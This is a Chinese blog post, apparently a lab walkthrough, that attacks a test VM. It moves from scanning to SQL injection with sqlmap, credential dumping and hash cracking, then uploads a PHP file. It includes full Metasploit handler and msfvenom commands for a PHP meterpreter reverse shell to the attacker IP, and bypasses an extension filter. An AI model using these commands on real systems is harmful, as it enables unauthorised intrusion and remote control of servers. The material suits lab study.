zoukankan      html  css  js  c++  java
  • 从SQL注入到进入服务器

    攻击机ip:192.168.1.3

    靶机ip:192.168.1.6

    首先,我们使用dirb命令和nmap进行扫描发现了以该ip为url的网站

    仔细搜寻该页面发现个Admin栏,点击发现了一个登陆页面

    然后我们使用owasp-zap扫描器扫描该网站

    在博主准备使用时发现我的kali居然没有自带这个工具,百度了以下才发现原因竟然时当时没怎么更新,被kali移除了,不过现在又可以下载了

    使用apt-get install zaproxy这条命令就可以下载安装了

    那么我们开始扫描这个网站吧!

    发现如下漏洞

     既然存在sql注入漏洞,那么我们就可以利用该漏洞进入数据库拿用户名和密码了,使用sqlmap进行爆破!得到用户名和密码如下

     password下面那个长长的字符串时密码的哈希值,将其解码就得到了后面那个密码

    那么我们就可以使用这个账号和密码进行登陆服务器了!

    然后发现了一串文字,说上传图片,那就以为着还存在文件上传漏洞!那我们试试能不能让服务器自己反弹个shell回显到kali终端。不过在这之前我们先要启动监听。

    msf > use exploit/multi/handler

    msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

    msf exploit(handler) > set lhost 攻击机IP地址

    msf exploit(handler) > set lport 4444

    msf exploit(handler) > run

    然后我们在制作一个木马

    我们可以利用metasploit生成shell,命令如下:msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.3 lport=4444 -f raw > /root/Desktop/shell.php 然后就会在桌面生成一个名为shell.php的shell,然后在上传到服务即可

    但是我们发现它对上传的文件的后缀名进行了验证,必须是.PHP才可以上传

     既然如此,那我们就把shell的后缀名改成PHP就行了。上传成功后,点击该文件,执行文件。

    但是此时来问题了,终端给我回显了个这个

     不知道为啥是从本地反弹shell给了本地???这咋整?有知道的师傅给支个儿招吗?

  • 相关阅读:
    预备作业02-162315马军
    预备作业01-162315马军
    # 2017-2018-1 20155224 《信息安全系统设计基础》第四周学习总结
    # 2017-2018-1 20155224 《信息安全系统设计基础》第3周学习总结
    # 第二周课堂实践以及MyOD
    # 2017-2018-1 20155224 《信息安全系统设计基础》第1周学习总结
    # 20155224 2016-2017-2《Java程序设计》课程总结
    # 20155224 实验五 Java网络编程及安全
    # 20155224 课堂实践 MyOD
    # 20155224 实验四 Android程序设计
  • 原文地址:https://www.cnblogs.com/Hbbbb/p/12680727.html
Copyright © 2011-2022 走看看